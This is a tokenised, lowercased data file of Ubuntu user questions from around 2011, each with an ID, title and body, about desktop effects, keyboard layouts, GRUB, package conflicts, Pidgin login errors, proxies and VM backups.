88860	how do i make my windows `` wavy '' ?	i installed an ubuntu version about 6 months ago , and in the appearance settings , i could check a box that made the windows `` wavy '' when you move them . like , whenever you moved a window side to side , it made them look like gravity was affecting it . i forgot what the term was for this , but i ca n't seem to find a place to do this in the latest version of ubuntu .
88862	how to map `` รง '' to another key ?	i have a new keyboard and it has an enter key smaller than my previous keyboard , right next to it there is this key `` รง '' and i always hit it when trying to hit enter . i do n't use this รง key , so is there a way i could map it to the enter key ? i am using ubuntu 10.04 , the keyboard is a genius slimstar 110 . update : i solved it using sudo xmodmap -e `` keysym 51 = kp_enter '' , but will that survive a restart ?
88863	how do i use the 32-bit jvm on a 64 bit os ?	i have a 64-bit server with only 1 gib of ram ( vm at rackspace ) . i need to run a few instances of the jvm , and the 64 bit vms are consuming too much ram . i ca n't seem to find anyplace that tells me how to install the 32-bit packages of openjdk . when i run with -d32 , i get told : # java -d32 -version this java instance does not support a 32-bit jvm . please install the desired version . when i run with -client , i still get the server vm : # java -client -version java version `` 1.6.0_22 '' openjdk runtime environment ( icedtea6 1.10.2 ) ( 6b22-1.10.2-0ubuntu1~11.04.1 ) openjdk 64-bit server vm ( build 20.0-b11 , mixed mode ) is it even possible to use the 32-bit client vm on 11.04 ?
88865	how can i get ubuntu one to pick up files in ~/documents on windows ?	as part of my attempt to migrate from windows to ubuntu , i have installed ubuntu one on my windows machine . now i want to sync my documents from that machine in to the cloud . i have instructed ubuntu one to sync my documents folder . if i create a directory in my documents folder in the cloud , at https : //one.ubuntu.com/ , one will sync that directory down to my local documents . but the files in my local documents do n't get synced up to the cloud . files that i add to my local ~/ubuntu one folder do get synced up to the cloud , and vice versa . it 's just the documents folder that seems to sync one-way . is this a bug ? a feature ? an option i need to set ?
88867	11.04 to 11.10 upgrade aborted due to power cut , now update manager saying no internet connection	while upgrading to 11.10 from 11.04 , because of powercut , the system got switched off abruptly ( due to no back-up battery ) and the upgrade got aborted in the midway . next time when i connected to internet , i found that i 'm still in 11.04 and i 'm unable to find upgrade to 11.10 and also now when i try to check for updates , i 'm getting a pop-up saying `` no internet connection '' . but i 'm connected to internet and surfing as usual . any help ?
88869	onlive using wine the raw input	i 've been doing a great deal of searching for the past few days for this . i used to be able to play onlive games with wine . ( with a few tweaks here and there . ( i think . ) ) but the problem now is that wine is not taking my raw input from my mouse/keyboard . i found a few patches that may work , but im very very new to all of this `` patching and compiling '' nonsense . so all in all , i 'm lost . help !
88871	how to remove remaining files after removing an application	i installed zekr application and tried to change the fonts by deleting the default lines . even after removing the application and reinstalling it again the default configuration is not restored which is due to the remanent files .
88875	how do i give the gift of ubuntu one music store	i would like to give my adult child a paid ubuntu one account as a gift . how do i pay for his account , and make it surprise ? gift certificate ? prepaid ?
88876	extact video file from quicktime web player	how can i extract video link form http : //mediaservers.vtc.com:80/movieplayers/get_media_player.php ? f=/photoshopcs5_fr/movies/02/0202.mov & vtclogin=u4646286 it is clearly seen that it is calling media file with ref . it does not start in web browser ( ubuntu ) but work with mac . i do n't have plugin problem ( gstreamer and restricted-extras are already installed ) . i need to extract the video file link . ( java , python , c++ or any other scripting language ) thanks in advance
88877	how can i fix my keyboard layout ?	for a long time , i 've had my keyboard configured to use the layout currently known as `` english ( international altgr dead keys ) . '' i like this layout because without any modifier keys , it 's identical to the us english keyboard , but when i hold right alt i can get accented letters and other characters not available on a standard us english keyboard . in oneiric , however , the layout is messed up . right alt+n produces `` ñ '' as expected . and another method works : right alt+` , e produces `` è '' , also as expected . but there 's no way to type `` é '' , which is probably the accented letter i type the most . i expect right alt+a , e to do the trick . but instead of a dead key for the acute accent , it uses a method for combining characters to create the hybrid `` ́e '' . this hybrid looks like the proper `` é '' in some settings , but it is n't the same character and does n't always work . ( for example , in the text input box as i type this , it looks the same as the proper character , but when displayed on the site for all so see , it looks very wrong -- at least on my machine . ) ditto for all other characters with an acute accent , though some are available directly as pre-composed characters : for example , right alt+i yields `` í '' . how can i change the acute accent on the a key to a proper dead key ? perhaps the more general version of this is : how can i tweak my keyboard layout ? update i just tested this on my other machine , also running oneiric , but upgraded from previous versions . i have no problems with the second machine . the problem machine was a fresh install of oneiric , but i kept my old $ home when i did the fresh install . clarification even if an answer does n't address my specific examples , i would still accept it if it provided enough detail for me to find the layout and tweak it according to my needs . major update after working through the information gained through jim c 's and chascon 's helpful replies , i 've learned something new : the problem is n't with the layout itself , but with the fact that the selected layout is n't being applied . when i look at the definition in /usr/share/x11/xkb/symbols/us of the layout i 've been running for a long time , i found that the definition does n't match what i get when i type . in addition , the keyboard layout dialog that 's supposed to show the current layout looks different from the way the layout is defined in the file i mentioned , and matches what actually happens when i type . following jim c 's suggestion , i created a new layout in /usr/share/x11/xkb/symbols/us containing some modifications to the layout i want . i can select my layout from the keyboard properties , and i can use in on the console following chascon 's post , but the layout i get when typing is unchanged . apparently , there 's a different layout defined somewhere that 's overriding what i 've set . where is that layout hiding ? this problem occurs in unity ( 3d and 2d ) , but i was able to get the correct layout set in xfce . in case it 's relevant , this problem has occurred since i installed oneiric fresh on this machine ( though i preserved my $ home ) . i do n't recall whether this problem occurred before the reinstall . also , in case it 's relevant , i also run ibus so i can type korean . i have a few difficulties with ibus , but i doubt they 're related .
88878	working with remote dekstop ?	i am running a ubuntu 11.10 virtual machine under kvm hypervisor , bridged and connected to the local network . i installed vncserver in the virtual machine and tried remote desktop , what happens is when i remotely connect to the virtual machine ( through vnc i used to add the :1 tag ) , the desktop is greyed out and i can access only the terminal ( pressing ctrl+alt+t in desktop ) . from terminal i can open firefox and other gui installed software . the thing is i can not see my desktop . at the terminal whenever i press the letter 'd ' it is going to desktop . and , when i tried to access the remote machine only with the ip ( with no vnc tag in remote desktop viewer ) it returns .. `` can not connect to host xx.xxx.xx.xx was closed '' . pl help me thro ' this problem thanks ,
88880	for a newbie , what software/ ide is best to build a website ?	what software would you recommend for a newbie ( not much experience in html code ) to develop websites ? it would be great if it is simple to use ( for basic work ) but can also support advanced usage . will it be better to go for an ide or a standalone editor kind of program ? the website will have basic stuff like drop-down-on-hover menus , buttons , change-color-on-hover buttons , images and text in multiple columns , etc . thanks in advance for your suggestions .
88885	how to copy usb stick with multiple partitions ?	i have a usb stick with two partitions fat 32 adn ext3 . first one is used to boot from using systemrescuecd . second one contains the image i use with image recovery tool . i have to copy such an usb 10 times so i thouhgt maybe there is an easy way to do this , something like cp /dev/sdb ?
88896	remove partition from devices	i want to remove my windows and recovery partition from under the devices so that no one accidentally edits them . i 'm using ubuntu 11.10 .
88898	installation failure on amd quad core on a8 64bit	i have been having a lot of trouble installing ubuntu on a new machine a samsung with an amd a8 quad core with 4gb of ram . finally got through the installation by pressing f6 drop-down box . select nomodeset [ will show x sign ] . press esc and select 2nd option , 'install ubuntu ' . everything ok all options set up . only thing i did notice was that it advised 4,5gb of ram but i was already in the installation process and did n't really want to start over again . anyway , when i boot up now and select ubuntu from grub menu it just shows a strange screen for a second an then it hangs with the hdd audibly working . is my problem the ram ? should i try and install 32-bit ? if so how can i do this , cause if i try to run my 32-bit cd it will not accept the f6 nomodeset command to run . it just goes back to first line copyright etc . how do i install 32 over 64-bit if needed . thanks antony
88900	how can i quickly access my music from the desktop ?	any suggestions on how can i play music files directly from the desktop without opening file manager ? for example : in windows , i can do it by adding a directory toolbar to the taskbar .
88902	how to remove oracle jdk and install openjdk ?	i 've installed oracle java using this manual : http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux it did not , however , work any better than openjdk . in fact , much worse . after trying to reinstall openjdk , however , things went wrong and i 'm left without any java at all . could someone please help me through this ?
88905	need help restoring grub settings to default settings	i 'm running 11.04 and decided to spend my winter break tweaking grub until i could boot directly into tty1 and i got turned around somewhere . i still boot into tty7 but i have two new problems . the first is , while ubuntu is loading , instead of the ubuntu logo or any information about what processes are being started , i get a flashing cursor in the top left of my screen . the graphical login from tty7 will eventually load up but , until it does , all i can see if the flashing cursor . the second problem that i have is the screen resoluton on my other tty 's has been changed . it looks like it 's about 640 x 48 . i believe that it had been around 1280 x 720 before . at this point , i 'm just interested in returning grub to the default settings that existed when i installed 11.04 . here 's a copy of my grub configuration for reference . quote : # if you change this file , run 'update-grub ' afterwards to update # /boot/brug/grub.cfg # for full documentation of options in this file see : # info -f grub -n 'simple confuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor='lsb_release -i -s 2 > /dev/null || echo debian' grub_cmdline_linux_default= '' quiet splash ipv6.disable=1 '' grub_cmd_line= '' vga=775 splash '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernal that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567 , 0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command 'vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' if this helps , these are the commands that grub is entering before i boot . i got this information by pressing the e key at the grub menu : setparams 'ubuntu , with linux 2.6.38-13-generic' recordfail set gfxpayload= $ linux_gfx_mode insmod par_msdos insmod ext2 set root= ' ( dev/sda , msdos5 ) ' seach -- no-floppy -- fs-uuid -- set=root 4153ea84-7423-49a3-8eb80-4007a4326dda linux /vmlinux-2.6.38-13-generic root=uuid=914b61f6-c063-4df1-a0c3-99e4b6022b7 ro vga=775 splash quiet splash ipv6.disable=1 vt.handoff=7 initrd /initrd.img-2.6.38-13-generic
88908	many ( many ! ) bookmarks in firefox make the desktop lock up on hovering `` bookmarks '' in firefox . fixes ?	i have several tens of thousands of bookmarks in firefox . whenever i accidentaly hover over the `` bookmarks '' entry of firefox menu in global menu , my whole desktop freezes for half a minute . now , i know the obvious solution is `` less bookmarks '' . but that is a workaround . i actually consider this a bug , because when an app can not handle x amount of things , it should disallow a user to have more then x things : ) . but for now , is there a quickfix ?
88912	aptitude offers to remove some packages but apt-get does n't ?	i 'm trying to install mint-meta-mate which is gnome 2 fork on 11.10 - 32bit with aptitude i get this : the following new packages will be installed : caja { a } cowsay { a } fortune-mod { a } fortunes-husse { a } fortunes-min { a } gir1.2-mate-menus { a } gtk2-engines-aurora { a } gtk2-engines-candido { a } intltool { a } libart-2.0-dev { a } libcaja-extension { a } libgail-dev { a } libmate { a } libmatecanvas { a } libmatecomponent { a } libmatecomponentui { a } libmatedesktop { a } libmatekbd { a } libmatekeyring { a } libmatenotify { a } libmatepanelapplet { a } libmateui { a } libmateweather { a } librecode0 { a } libtasn1-3-bin { a } libtasn1-3-dev { a } mate-backgrounds { a } mate-common { a } mate-conf { a } mate-conf-common { a } mate-conf-editor { a } mate-control-center { a } mate-corba { a } mate-desktop { a } mate-dialogs { a } mate-doc-utils { a } mate-file-manager { a } mate-icon-theme { a } mate-keyring { a } mate-media { a } mate-menus { a } mate-mime-data { a } mate-notification-daemon { a } mate-panel { a } mate-panel-common { a } mate-polkit { a } mate-session-manager { a } mate-settings-daemon { a } mate-terminal { a } mate-utils { a } mate-vfs { a } mate-window-manager { a } mint-artwork-common { a } mint-artwork-gnome { a } mint-artwork-mate { a } mint-backgrounds-lisa { a } mint-common { a } mint-info-fluxbox { a } mint-meta-mate mint-translations { a } mint-x-icons { a } mint-x-theme { a } mint-z-theme { a } mintdesktop { a } mintmenu { a } mintsystem { a } python-corba { a } python-mate { a } python-mate-desktop { a } python-mate-menu { a } the following packages will be upgraded : libgail-common libgail18 libgtk2.0-0 libgtk2.0-dev 4 packages upgraded , 70 newly installed , 0 to remove and 34 not upgraded . need to get 114 mb of archives . after unpacking 315 mb will be used . the following packages have unmet dependencies : gtk2-engines-pixbuf : depends : libgtk2.0-0 ( = 2.24.6-0ubuntu5 ) but 2.24.6-0ubuntu5linuxmint1 is to be installed . the following actions will resolve these dependencies : remove the following packages : 1 ) gnome-themes 2 ) gnome-themes-selected 3 ) gnome-themes-ubuntu 4 ) gtk2-engines-pixbuf 5 ) openshot 6 ) ubuntustudio-video keep the following packages at their current version : 7 ) mint-artwork-gnome [ not installed ] 8 ) mint-artwork-mate [ not installed ] 9 ) mint-meta-mate [ not installed ] accept this solution ? [ y/n/q/ ? ] with apt-get this : the following extra packages will be installed : caja cowsay fortune-mod fortunes-husse fortunes-min gir1.2-mate-menus gtk2-engines-aurora gtk2-engines-candido gtk2-engines-pixbuf intltool libart-2.0-dev libcaja-extension libgail-common libgail-dev libgail18 libgtk2.0-0 libgtk2.0-dev libmate libmatecanvas libmatecomponent libmatecomponentui libmatedesktop libmatekbd libmatekeyring libmatenotify libmatepanelapplet libmateui libmateweather librecode0 libtasn1-3-bin libtasn1-3-dev mate-backgrounds mate-common mate-conf mate-conf-common mate-conf-editor mate-control-center mate-corba mate-desktop mate-dialogs mate-doc-utils mate-file-manager mate-icon-theme mate-keyring mate-media mate-menus mate-mime-data mate-notification-daemon mate-panel mate-panel-common mate-polkit mate-session-manager mate-settings-daemon mate-terminal mate-utils mate-vfs mate-window-manager mint-artwork-common mint-artwork-gnome mint-artwork-mate mint-backgrounds-lisa mint-common mint-info-fluxbox mint-translations mint-x-icons mint-x-theme mint-z-theme mintdesktop mintmenu mintsystem python-corba python-mate python-mate-desktop python-mate-menu suggested packages : filters fortunes libgail-doc libgtk2.0-doc mate-doc-utils-gnome the following new packages will be installed : caja cowsay fortune-mod fortunes-husse fortunes-min gir1.2-mate-menus gtk2-engines-aurora gtk2-engines-candido intltool libart-2.0-dev libcaja-extension libgail-dev libmate libmatecanvas libmatecomponent libmatecomponentui libmatedesktop libmatekbd libmatekeyring libmatenotify libmatepanelapplet libmateui libmateweather librecode0 libtasn1-3-bin libtasn1-3-dev mate-backgrounds mate-common mate-conf mate-conf-common mate-conf-editor mate-control-center mate-corba mate-desktop mate-dialogs mate-doc-utils mate-file-manager mate-icon-theme mate-keyring mate-media mate-menus mate-mime-data mate-notification-daemon mate-panel mate-panel-common mate-polkit mate-session-manager mate-settings-daemon mate-terminal mate-utils mate-vfs mate-window-manager mint-artwork-common mint-artwork-gnome mint-artwork-mate mint-backgrounds-lisa mint-common mint-info-fluxbox mint-meta-mate mint-translations mint-x-icons mint-x-theme mint-z-theme mintdesktop mintmenu mintsystem python-corba python-mate python-mate-desktop python-mate-menu the following packages will be upgraded : gtk2-engines-pixbuf libgail-common libgail18 libgtk2.0-0 libgtk2.0-dev 5 upgraded , 70 newly installed , 0 to remove and 33 not upgraded . need to get 115 mb of archives . after this operation , 315 mb of additional disk space will be used . do you want to continue [ y/n ] ? why does aptitude wants to remove some packages like openshot ? it does n't make sense to me .
88915	stylus-toolbox ca n't write to /dev/lp0	on ubuntu 11.10 i try to monitor ink levels with stylus-toolbox . i have a epson sx100 . firstly it defaults to /dev/usb/lp0 which does n't exist . i changed it to /dev/lp0 which does exist . then it had read/write issues so i did sudo chown donald /dev/lp0 and put myself in the lp group . then stylus-toolbox got further but reported `` can not write to /dev/lp0 : resource temporarily unavailable . '' stylus-toolbox worked ok on maverick without any problems but does n't work on oneiric . this means that i have to go the windows xp to find which ink cartridge is empty . this is the only thing i need in xp otherwise i would ditch it !
88921	burg installation error	i tired to install burg with following commands : sudo add-apt-repository ppa : n-muench/burg sudo apt-get update sudo apt-get install burg burg-themes everything went fine but when i run sudo burg-emu instead of showing burg theme it shows burg version 1.98+20100623-2.3 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > in the terminal . now i think that i did something wrong . i think if i restart now , my computer might not boot showing same grub > . so , how to fix this ? i want to install burg either way . update : i restarted my computer but nothing happened . there was no burg menu rather it was same old grub .
88922	window borders missing - gtk-window-decorator segmentation fault	i have been using ubuntu for about 1 year now and i got a problem just two days ago . suddenly i started experiencing a problem with the window borders ( title bar with close , maximize , and minimize buttons ) . the problem : the window borders disappear i run `` gtk-window-decorator -- replace '' for like 20 seconds everything is back to normal but it again returns to the problem . i searched over the internet and found that my problem is similar to what is specified in this bug report : https : //bugs.launchpad.net/ubuntu/+source/compiz/+bug/814091 this bug report says that the `` fix released '' . i updated everything using the update manager , but still the problem remains . can anyone let me know whether the problem is fixed ? if yes , can you please let me know how to do it ? i have already tried normal replace/reset commands like unity -- reset unity -- replace compiz -- replace the `` window borders '' plugin is on in ccsm ( compizconfig settings manager ) and it points to `` gtk-window-decorator '' . i use ubuntu 11.10 on an intel core2duo t6500 with amd mobility radeon hd 4300 graphics card . if you need more information , please let me know .
88925	creative labs x-fi audio not working on ubuntu 11.10	on a fresh install of ubuntu 11.10 i get no sound at all . dell precision t5500 with built in sound card : 81:00.0 audio device : creative labs x-fi titanium series [ emu20k2 ] ( rev 03 ) device is listed in hardware tab of sound configuration . does n't make a peep during speaker test .
88926	how can i browse the ubuntu software centre online ?	i 'd like to access entire contents of the ubuntu software center online . is there anyway to browse the software center online ?
88928	can this spec do smooth and lag free flash ?	i 'm about to buy the following spec : cpu : intel core i3 2100 3.10 ghz ram : 16gb 1600mhz gpu : 2x gt 430 1gb ignoring the ram which i need for vm 's and the 2x gpu 's which i need for 4 monitors . my question is , will that cpu and those gpu 's be able to playback youtube flash videos at 1080p smoothly and will they be able to run the following web flash based applications without lag ? http : //www.sumopaint.com/app/ http : //www.homestyler.com/designer i currently have : cpu : pentium d 3.0ghz gpu : builtin to motherboard ram : 3gb and it ca n't do 1080p flash smoothly and those flash based applications have a lot of lag .
88931	bash script change a word into a file	i have a file like this : product : $ name | year : $ year | type : $ type product2 : $ name2 | year : $ year | type : $ type2 product3 : $ name3 | year : $ year | type : $ type product4 : $ name4 | year : $ year | type : $ type3 product5 : $ name5 | year : $ year | type : $ type product6 : $ name6 | year : $ year | type : $ type product7 : $ name7 | year : $ year | type : $ type3 product8 : $ name8 | year : $ year | type : $ type2 and i want to change a specifiy field . for example i want to change the type of product5 from $ type to $ type2 but i do n't want to replace the whole line , only the field i 'd like to change ! is this possible ?
88932	how to use a recipe to deal with ppa package dependency change across distribution	i am using a recipe to keep a program packaged in my ppa . from oneiric onwards it seems that some of the dependency locations have changed . specifically the libqtcore.so ( and a couple other qt libs ) . all the legacy versions of the application build but oneiric and precise have failed to build from the old recipe . i can deal with this locally because i can change the library location in the rules file . i was wondering how best to deal with this in my ppa . should i have a separate debian file in its own repo that is specific for the release , get the recipe to pull the debian file and merge when its time to build ? then have separate recipe for each distro ? or can i deal with this in the recipe directly . or is there a better way that i have n't thought of . thanks
88936	how to remove old kernel versions automatically ?	i know number of ways to remove old kernel versions manually . is there any way to remove old kernel versions automatically ? automatically , in the sense i do n't have to do the same thing each time the kernel gets updated .
88938	difference between kernel source code ( kernel.org ) and linux-source ( in software center )	what is the difference between kernel code downloaded from http : //www.kernel.org and the one downloaded from software center linux-source package ? which one is better for writing a device driver ?
88945	hotkeys stop working in eclipse	i 've recently moved to ubuntu 11.10 ( 64bit , unity ) and encounter the following problem - at some point ( it 's hard to tell exactly , but it seems to happen after a couple switches between workspaces , but might as well be something else ) hotkeys ( like ctrl + smth ) stop working . i can clearly tell it happens in eclipse , but other apps might have the same problem . after some time they start working normally ( after switching windows/workspaces may be ) . it 's not fatal , but really annoying . is there some way to fix it ? i 've looked at this question with similar problem , but answers does n't seem to provide universal solution .
88946	is there a straight forward 3d sketch tool capable of producing wireframe vector images ?	inkscape features a nice mode to create isometric projections of three dimensional images . the results can be exported nicely as svg or pdf . for many applications this is preferable over a rendered bitmap image ( as produced by blender , povray , etc. ) . also , vector graphics appear more technical and less playful , which looks more professional depending on the context . and finally , vector graphics are more suitable for post-processing . however , inkscape 's axonometric grid method has a number of disadvantages : the viewpoint is fixed . once , you have setup the grid , it is not possible to rotate the scene . i can not figure out how to draw a sphere . inkscape has no concept of front and back , so you have to manually hide or dash lines that would be invisible . ( or use opaque objects and manually get the order right . ) inkscape does n't have any concept of three dimensional space at all . the whole thing remains a 2d vector graphic , which if well-done creates a three-dimensional impression . is there something like inkscape in 3d , where i can work with 3d objects , and create the isometric view from the 3d model . to clarify : technically , i want a simple 2d vector graphic ( preferably as svg ) , that looks 3d to the human eye . apparently google sketchup can produce such graphics ( as pdf , which can be converted to svg ) . here is an example . i want to draw arbitrary solid shapes that automatically get a shading as if they had some simple lighting projected on them .
88948	control mouse pointer with keyboard without a number pad	i have dell laptop which does not have a numberpad , only a set of numbers above the qwerty layout . i want to be able to control the mouse cursor with my arrow keys . i activated the mouse keys by going to `` system setting '' - > `` universal access '' - > `` pointing and clicking '' and activate `` mouse keys '' but still , i am unable to control the mouse cursor . how do i get this going so i do n't have to take my hands off the keyboard ?
88953	which version of ubuntu is best for `` old '' 2ghz celeron	so i have : 2ghz celeron ( 478 ) 3x 512mb 266mhz ram ati radeon hd 2400 pro agp i use 11.10 ( instalated from windows ) but is very slow ( i use it for internet , chat , youtube and one online game ) so which version is better for my pc 10.xx or 9.xx
88959	is there a method of linking your ubuntu account to your ubuntu one/social network ?	when i use my android device , i can sync my contacts from facebook and twitter with their photos et al . i 've also been using the windows 8 developers preview recently which links into your windows live account . is there any method to do something similar in ubuntu ? or are there plans to do so in later releases ?
88960	non functioning of touch pad & mouse	very often i find that the cursor is not moving and the touch pad is also not working while working with ubuntu 11.10 . i then have to do the task by attaching external mouse . please help .
88961	does silent updates also upgrade to the latest distribution ?	i enabled silent updates for all my repositories and wondering if this would also automatically silently upgrade my ubuntu 10.04 to ubuntu 12.04 when the upgrade is available in april ?
88962	backing up a vm server to an external usb drive	i have an ubuntu 10.04 server running my vms on kvm/qemu . i 've been manually pausing my vms ( using virt-manager gui ) and then copying the /var/lib/libvirt folder to an external usb drive at /mnt/usbexterno this obviously is far from ideal . i need a solution to run a backup everynight . i thougt about using a cron job with a script to pause the vms and copy the files to the drive . i 've read on a forum that i could use virsh to save the vm state to a file , but i dont think thats what i need , since i want a full backup of everything in case the server goes boom ! so , short version . i need something to run a daily backup of my vms to an external usb drive , the vms can be paused during the night . theres no gui available on the server . any suggestions ?
88972	how to get ( from terminal ) total number of threads ( per process and total for all processes )	i tried googling it , but i ca n't find it . i am looking for : number of threads in process x total number of threads running currently
88976	407 proxy authentication required	when i try to install a software using ubuntu software center i get : failed to download repository information check your internet connection when i try to do a apt-get install something , i get : 407 proxy authentication required i use a proxy server that requires a user-name and a password . i have set my systems proxy manually , by plugging in the required numbers in the networks proxy and applied it system wide . i guess the problem now is plugging in my user-name and password . when i use internet via mozilla , it specifically asks me for my user-name and password .
88989	unable to connect to google talk using pidgin ( sasl error )	after a fresh install of ubuntu 11.10 , pidgin stopped connecting to any jabber service ( google talk and a local im ) . the weird thing is , the same configuration works on a laptop with ubuntu 11.10 , but not on a workstation . the .purple directory has been copied from laptop to workstation , and it still does n't work . when running piding -d > pidgin.log , following is observed : ( 16:06:25 ) account : connecting to account foo @ gmail.com/ . ( 16:06:25 ) connection : connecting . gc = 0x7f38e3828ea0 ( 16:06:25 ) dnssrv : querying srv record for gmail.com : _xmpp-client._tcp.gmail.com ( 16:06:25 ) dnssrv : found 5 srv entries ( 16:06:25 ) dnsquery : performing dns lookup for xmpp.l.google.com ( 16:06:25 ) dns : wait for dns child 11596 failed : no child processes ( 16:06:25 ) dns : created new dns child 11867 , there are now 1 children . ( 16:06:25 ) dns : successfully sent dns request to child 11867 ( 16:06:25 ) dns : got response for 'xmpp.l.google.com' ( 16:06:25 ) dnsquery : ip resolved for xmpp.l.google.com ( 16:06:25 ) proxy : attempting connection to 173.194.70.125 ( 16:06:25 ) proxy : connecting to xmpp.l.google.com:5222 with no proxy ( 16:06:25 ) proxy : connection in progress ( 16:06:25 ) proxy : connecting to xmpp.l.google.com:5222 . ( 16:06:25 ) proxy : connected to xmpp.l.google.com:5222 . ( 16:06:25 ) jabber : sending ( foo @ gmail.com ) : < ? xml version='1.0 ' ? > ( 16:06:25 ) jabber : sending ( foo @ gmail.com ) : < stream : stream to='gmail.com ' xmlns='jabber : client ' xmlns : stream='http : //etherx.jabber.org/streams ' version='1.0 ' > ( 16:06:25 ) jabber : recv ( 379 ) : < stream : stream from= '' gmail.com '' id= '' 49198e875f30f7d0 '' version= '' 1.0 '' xmlns : stream= '' http : //etherx.jabber.org/streams '' xmlns= '' jabber : client '' > < stream : features > < starttls xmlns= '' urn : ietf : params : xml : ns : xmpp-tls '' > < required/ > < /starttls > < mechanisms xmlns= '' urn : ietf : params : xml : ns : xmpp-sasl '' > < mechanism > x-google-token < /mechanism > < mechanism > x-oauth2 < /mechanism > < /mechanisms > < /stream : features > ( 16:06:25 ) jabber : sending ( foo @ gmail.com ) : < starttls xmlns='urn : ietf : params : xml : ns : xmpp-tls'/ > ( 16:06:25 ) jabber : recv ( 50 ) : < proceed xmlns= '' urn : ietf : params : xml : ns : xmpp-tls '' / > ( 16:06:25 ) nss : subject=cn=gmail.com , o=google inc. , l=mountain view , st=california , c=us issuer=cn=google internet authority , o=google inc , c=us ( 16:06:25 ) nss : subject=cn=google internet authority , o=google inc , c=us issuer=ou=equifax secure certificate authority , o=equifax , c=us ( 16:06:25 ) nss : subject=ou=equifax secure certificate authority , o=equifax , c=us issuer=ou=equifax secure certificate authority , o=equifax , c=us ( 16:06:25 ) certificate/x509/tls_cached : starting verify for gmail.com ( 16:06:25 ) certificate/x509/tls_cached : checking for cached cert ... ( 16:06:25 ) certificate/x509/tls_cached : ... found cached cert ( 16:06:25 ) nss/x509 : loading certificate from /home/david/.purple/certificates/x509/tls_peers/gmail.com ( 16:06:25 ) certificate/x509/tls_cached : peer cert matched cached ( 16:06:25 ) nss/x509 : exporting certificate to /home/david/.purple/certificates/x509/tls_peers/gmail.com ( 16:06:25 ) util : writing file /home/david/.purple/certificates/x509/tls_peers/gmail.com ( 16:06:25 ) certificate : successfully verified certificate for gmail.com ( 16:06:25 ) jabber : sending ( ssl ) ( foo @ gmail.com ) : < stream : stream to='gmail.com ' xmlns='jabber : client ' xmlns : stream='http : //etherx.jabber.org/streams ' version='1.0 ' > ( 16:06:25 ) jabber : recv ( ssl ) ( 138 ) : < stream : stream from= '' gmail.com '' id= '' f6fd74872873a647 '' version= '' 1.0 '' xmlns : stream= '' http : //etherx.jabber.org/streams '' xmlns= '' jabber : client '' > ( 16:06:25 ) jabber : recv ( ssl ) ( 197 ) : < stream : features > < mechanisms xmlns= '' urn : ietf : params : xml : ns : xmpp-sasl '' > < mechanism > plain < /mechanism > < mechanism > x-google-token < /mechanism > < mechanism > x-oauth2 < /mechanism > < /mechanisms > < /stream : features > ( 16:06:25 ) sasl : sasl_state is -1 , failing the mech and trying again ( 16:06:25 ) connection : connection error on 0x7f38e3828ea0 ( reason : 3 description : server does not use any supported authentication method ) ( 16:06:25 ) account : disconnecting account foo @ gmail.com/ ( 0x7f38e2ca5b50 ) ( 16:06:25 ) connection : disconnecting connection 0x7f38e3828ea0 ( 16:06:25 ) jabber : sending ( ssl ) ( foo @ gmail.com ) : < /stream : stream > ( 16:06:25 ) connection : destroying connection 0x7f38e3828ea0 as you can see , certificate seems to be valid , the problematic one is : sasl : sasl_state is -1 , failing the mech and trying again there is no firewall enabled , so there has to be something else . any ideas ?
88990	start problem with radeon card	i have been slowly trying to get an installation finished . after a lot of mucking about i have got 11.10 installed but i still cant get it to start . after i get it selected and started i just get a purple window with a white top area for a second , and then back to black screen . i have now read a lot and can probably help some other people at least get installed . but the big problem seems to be the radeon card compatibility . my amd a8 runs hd6470m and h6620g . has anyone found realistic answers without having to be a programming genius or at least followable step by step instructions . will 11.04 work ? i have read a lot of stuff and am looking for a reality to get ubuntu up and running on my laptop . who is gon na save me ? thanks antony so since andrejv tells me that i should donload the driver but i am not clear about how i can see it to run without ubuntu as i can just download it windows downloads can i ?
88991	sync completely two ubuntu machines	is there any software to sync files-folders and software between two pcs ? for example if i install program 'a ' to my desktop i want to be installed to my laptop as well if i have synchronized these two . i want the same with my files and folders . if i change something to my desktop i want the changes to effect my laptop too ( i exclude ubuntu one as a solution ) . thanks for your time and patience !
88992	what to try when apt-get install xxx results in connection failed	is there something wrong with the repository , the server , or is my cache stale ? i am able to ping tw.archive.ubuntu.com just fine . it almost seems like the file http : //tw.archive.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_1.0-0ubuntu3.1_amd64.deb does n't exist . edit : looks like the server i 'm pointing to may be stale . i found the missing file here . it looks like you can check on whether servers are up to date . i 'm going to look into how to change my server now . $ sudo apt-get install kcachegrind reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : docbook-xsl exiv2 gstreamer0.10-alsa gstreamer0.10-pulseaudio icoutils kate-data katepart kde-runtime kde-runtime-data kdebase-runtime kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools kubuntu-debug-installer libasound2-plugins libattica0 libcanberra-pulse libclucene0ldbl libdbusmenu-qt2 libdlrestrictions1 libexiv2-10 libilmbase6 libiodbc2 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libnepomuk4 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libopenexr6 libphonon4 libplasma3 libpolkit-qt-1-1 libpulse-mainloop-glib0 libqapt-runtime libqapt1 libqca2 libqt4-dbus libqt4-declarative libqt4-designer libqt4-network libqt4-opengl libqt4-qt3support libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 